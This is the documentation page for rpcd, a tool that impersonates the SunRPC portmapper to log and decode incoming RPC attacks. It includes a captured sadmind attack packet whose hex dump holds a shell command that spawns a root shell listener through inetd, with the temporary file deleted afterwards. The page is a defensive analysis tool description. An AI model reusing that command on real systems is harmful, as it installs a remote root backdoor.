This program listens on udp and tcp ports 111 and 5111, accepts dumps network input to stdout, and replies to some packets.
Its purpose is to gather more information than is normally available about SunRPC attacks. Normally, all you can tell about an RPC attack is that port 111 was probed, which is hardly news and isn't very enlightening. This program will engage the attacking site in an RPC conversation so that the true target of the attack is revealed.
All strings and opaque data are printed and hex and ASCII. (Control characters and characters with the top bit set are replaced with '.')
Note: you cannot run this program and the portmapper together. For example, you cannot run this program if your machine is an nfs client with locking enabled since lockd need to register itself with portmapper.
The output from rpcinfo shows how many programs rpcd is advertising. Clients that call pamp_getmaps will see only these programs; clients that call clnt_create will be told port 5111 regardless of what program they ask for.
$ /usr/sbin/rpcinfo -p
program vers proto port
100000 2 tcp 5111 portmapper
100000 2 udp 5111 portmapper
100001 1 tcp 5111 rstatd
100001 1 udp 5111 rstatd
100001 2 tcp 5111 rstatd
100001 2 udp 5111 rstatd
100001 3 tcp 5111 rstatd
100001 3 udp 5111 rstatd
100002 3 tcp 5111 rusersd
100002 3 udp 5111 rusersd
100003 2 tcp 5111 nfs
100003 2 udp 5111 nfs
100003 3 tcp 5111 nfs
100003 3 udp 5111 nfs
100004 2 tcp 5111 ypserv
100004 2 udp 5111 ypserv
100005 1 tcp 5111 mountd
100005 1 udp 5111 mountd
[etc]
Here is suspicous packet received for sadmind. The top line gives the source address, the second line gives the time when the packet was received, and the remaining lines are the decoded packet. The RPC header says that the packet is a Call (ie. from client to server) for program 100232 (sadmind) procedure 1. The credentials supplied are localhost, uid 0, gid 0, which is obviously a lie. We don't know how to decode the sadmind procedure call packet so we just hex dump it:
Received packet from 216.102.44.162:45551 Time=998522713 Thu Aug 23 00:25:13 2001 xid=3b824602 dir=Call rpcvers=2 prog=100232 vers=10 proc=1 cred.flavour=1 cred.length=32 AUTH_UNIX time=998522913 machine_len=9 00000 6c 6f 63 61 6c 68 6f 73 - 74 localhost uid=0 gid=0 group_len=0 <> verf.flavour=0 verf.length=0 sadmind_PROC(1) 00000 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ................ [etc] 00080 41 44 4d 5f 46 57 5f 56 - 45 52 53 49 4f 4e 00 00 ADM_FW_VERSION.. 00090 00 00 00 03 00 00 00 04 - 00 00 00 01 00 00 00 00 ................ 000a0 00 00 00 00 00 00 00 11 - 41 44 4d 5f 43 4c 49 45 ........ADM_CLIE 000b0 4e 54 5f 44 4f 4d 41 49 - 4e 00 00 00 00 00 00 09 NT_DOMAIN....... 000c0 00 00 04 34 00 00 04 34 - ff ff ff ff ef ff a7 d8 ...4...4........ 000d0 ef ff 97 c4 ef ff a7 d8 - ef ff 97 c4 ef ff a7 d8 ................ [etc] 00480 ff ff ff ff 2f 62 69 6e - 2f 73 68 ff 2d 63 ff 65 ..../bin/sh.-c.e 00490 63 68 6f 20 27 70 63 73 - 65 72 76 65 72 20 73 74 cho 'pcserver st 004a0 72 65 61 6d 20 74 63 70 - 20 6e 6f 77 61 69 74 20 ream tcp nowait 004b0 72 6f 6f 74 20 2f 62 69 - 6e 2f 73 68 20 73 68 20 root /bin/sh sh 004c0 2d 69 27 20 3e 20 2f 74 - 6d 70 2f 2e 66 3b 20 2f -i' > /tmp/.f; / 004d0 75 73 72 2f 73 62 69 6e - 2f 69 6e 65 74 64 20 2d usr/sbin/inetd - 004e0 73 20 2f 74 6d 70 2f 2e - 66 3b 20 72 6d 20 2d 66 s /tmp/.f; rm -f 004f0 20 2f 74 6d 70 2f 2e 66 - 3b ff ff ff 00 00 00 00 /tmp/.f;....... 00500 00 00 00 00 00 00 00 09 - 41 44 4d 5f 46 45 4e 43 ........ADM_FENC 00510 45 00 00 00 00 00 00 03 - 00 00 00 04 00 00 02 9a E............... 00520 00 00 00 00 00 00 00 00 - 00 00 00 10 6e 65 74 6d ............netm 00530 67 74 5f 65 6e 64 6f 66 - 61 72 67 73 gt_endofargs End
Here's another example. This is what the server sees when an application calls clnt_create(). The portmapper is queried to get the port number for program 10024 (status) IP protocol 17 (udp). The reply is not printed by rpcd, but will be port 5111.
Received packet from 202.157.132.222:659 Time=993080402 Thu 00:40:02 2001 xid=5e7c691f dir=Call rpcvers=2 prog=100000 vers=2 proc=3 cred.flavour=0 cred.length=0 verf.flavour=0 verf.length=0 PMAPPROC_GETPORT pm_prog=100024 pm_vers=1 pm_prot=17 pm_port=0 Sending reply End
I haven't shown the sequence number in the examples above. The real output from the program has a sequence number at the start of every line that identifies which packet the line pertains to. This is because there are no guarantees about the dump from two packets not being interleaved. Use sort -n to reassemble the packets from the logs.
Use this program at your own risk! If you want to be as safe as possible, don't run any network service that you don't need to. This program is for the curious only.
The installation requires that you create an 'rpcd' account so that it can demote privilege before processing any data. This means that you are protected against direct root exploits, however, if an attacker were to find a way to run arbitrary code, they could take advantage of the unbound privileged udp socket to attack ypserv or nfs.
Even without any bugs, an attacker can cause it to consume resources simply by making lots of connections. You should set appropriate resource limits to control this, in particular, by ensuring that there is a limit on the number of processes that can be run. This will limit the number of tcp connections that can be handled (thus provided a DoS against this analysis tool).
The code is fairly long, nearly 1500 lines (excluding blank lines and comments), but this includes its own code for socket handling and xdr marshalling - none of the libc's rpc code is used. Many of the procedures are nearly identical in form. You can, and probably should, check the code yourself before running it. If you aren't able to understand the code, you shouldn't be running it!
| Source: | rpcd-1.1.tar.bz2 Browse sources |
|---|---|
| Binaries: | rpcd |
Peter Benie <peterb+rpcd@chiark.greenend.org.uk>
Linux Network